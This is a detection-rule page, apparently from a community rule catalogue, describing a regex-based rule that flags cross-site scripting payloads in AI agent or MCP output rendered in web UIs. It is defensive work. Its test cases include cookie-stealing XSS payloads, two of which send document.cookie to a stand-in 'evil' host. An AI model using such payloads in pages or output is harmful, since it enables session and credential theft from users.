ATR-2026-00571high上下文外洩experimental
Cross-site scripting (XSS) in agent / MCP rendered output
Agent/MCP output rendered in a web UI carries an XSS payload — an event handler that runs alert/eval/document.cookie, a javascript: scheme with a payload, or a <script> that exfiltrates cookies — enabling session/credential theft. Uses specific payload shapes (not bare <script>) to stay clean on benign HTML.
嚴重度
high
類別
上下文外洩
掃描目標
runtime
作者
ATR Community
建議回應
alert
參考資料
OWASP Agentic
ASI01:2026 - Agent Goal Hijack
OWASP LLM
LLM02:2025 - Sensitive Information Disclosure
MITRE ATLAS
AML.T0057 - LLM Data Leakage
偵測條件
組合方式: any- 01HTML event handler executing alert/eval/document.cookie欄位: content運算子: regex
- 02javascript: scheme with an executable payload欄位: content運算子: regex
- 03<script> exfiltrating cookies / loading remote code欄位: content運算子: regex
攻擊範例(規則會觸發)
<img src=x onerror=alert(document.cookie)>
<a href="javascript:fetch('//evil/'+document.cookie)"><script>new Image().src='//evil/?c='+document.cookie</script>
以上為真實攻擊 payload 的脫敏版本,與規則一同版本化,作為 regression test——確保未來的修訂不會悄悄漏掉它們。
正常樣本(規則不會觸發)
- benign 1
<button onclick="handleSubmit()">Save</button>
- benign 2
<script src="https://cdn.example.com/lib.js"></script>
- benign 3
<a href="https://example.com">link</a>
- benign 4
See the onload event in the docs
完整 YAML 定義
在 GitHub 編輯 →title: Cross-site scripting (XSS) in agent / MCP rendered output
id: ATR-2026-00571
rule_version: 1
status: experimental
description: 'Agent/MCP output rendered in a web UI carries an XSS payload — an event handler that runs alert/eval/document.cookie, a javascript: scheme with a payload, or a <script> that exfiltrates cookies — enabling session/credential theft. Uses specific payload shapes (not bare <script>) to stay clean on benign HTML.'
author: ATR Community
date: 2026/06/02
schema_version: '0.1'
detection_tier: pattern
maturity: test
severity: high
references:
cve:
- CVE-2025-62800
- CVE-2026-44429
- CVE-2026-27740
- CVE-2026-21866
cwe:
- CWE-79
external:
- https://github.com/jlowin/fastmcp/security/advisories
owasp_llm:
- LLM02:2025 - Sensitive Information Disclosure
owasp_agentic:
- ASI01:2026 - Agent Goal Hijack
mitre_atlas:
- AML.T0057 - LLM Data Leakage
metadata_provenance:
cve: human-authored
cwe: human-authored
compliance:
eu_ai_act:
- article: "15"
context: "Article 15 (accuracy, robustness and cybersecurity) requires high-risk AI systems to resist unauthorised attempts to alter their use, outputs or performance; this rule provides runtime detection evidence by flagging the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output)."
strength: primary
- article: "10"
context: "Article 10 (data and data governance) requires control over the data an AI system processes; this rule provides detection evidence for the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output) affecting that data."
strength: secondary
nist_ai_rmf:
- subcategory: "MS.2.7"
context: "NIST AI RMF MEASURE 2.7 (security and resilience evaluated and documented) is supported by this rule's runtime detection of the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output)."
strength: primary
- subcategory: "MS.2.10"
context: "NIST AI RMF MEASURE 2.10 (privacy risk examined and documented) is supported by this rule's detection of the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output)."
strength: secondary
iso_42001:
- clause: "8.1"
context: "ISO/IEC 42001 Clause 8.1 (operational planning and control, including control of externally provided processes) is operationalised by this rule's detection of the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output)."
strength: primary
- clause: "6.2"
context: "ISO/IEC 42001 Clause 6.2 (AI objectives and planning) calls for risk treatment of known attack patterns; this rule's detection of the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output) is such a treatment."
strength: secondary
tags:
category: context-exfiltration
scan_target: runtime
confidence: high
agent_source:
type: llm_io
framework:
- any
provider:
- any
detection:
condition: any
false_positives: []
conditions:
- field: content
operator: regex
value: (?i)\bon(?:error|load|mouseover|click|focus|toggle)\s*=\s*[\"']?\s*(?:alert|eval|fetch|document\.(?:cookie|location|write)|window\.|location\s*=|String\.fromCharCode|atob)\b
description: HTML event handler executing alert/eval/document.cookie
- field: content
operator: regex
value: (?i)javascript:\s*(?:alert|eval|document\.|window\.|fetch|String\.fromCharCode|void)
description: 'javascript: scheme with an executable payload'
- field: content
operator: regex
value: (?i)<script[^>]*>[^<]{0,200}?(?:document\.cookie|fetch\(|eval\(|atob\(|new\s+Image\(\)\.src|\.src\s*=\s*[\"']?https?://)
description: <script> exfiltrating cookies / loading remote code
response:
actions:
- alert
notify:
- security_team
test_cases:
true_positives:
- input: <img src=x onerror=alert(document.cookie)>
expected: triggered
description: attack 1
- input: <a href="javascript:fetch('//evil/'+document.cookie)">
expected: triggered
description: attack 2
- input: <script>new Image().src='//evil/?c='+document.cookie</script>
expected: triggered
description: attack 3
true_negatives:
- input: <button onclick="handleSubmit()">Save</button>
expected: not_triggered
description: benign 1
- input: <script src="https://cdn.example.com/lib.js"></script>
expected: not_triggered
description: benign 2
- input: <a href="https://example.com">link</a>
expected: not_triggered
description: benign 3
- input: See the onload event in the docs
expected: not_triggered
description: benign 4
更多 上下文外洩 規則
ATR-2026-00020highSystem Prompt and Internal Instruction LeakageATR-2026-00021criticalCredential and Secret Exposure in Agent OutputATR-2026-00075highAgent Memory ManipulationATR-2026-00102highData Exfiltration via Disguised Analytics CollectionATR-2026-00113criticalCredential File Theft from Agent Environment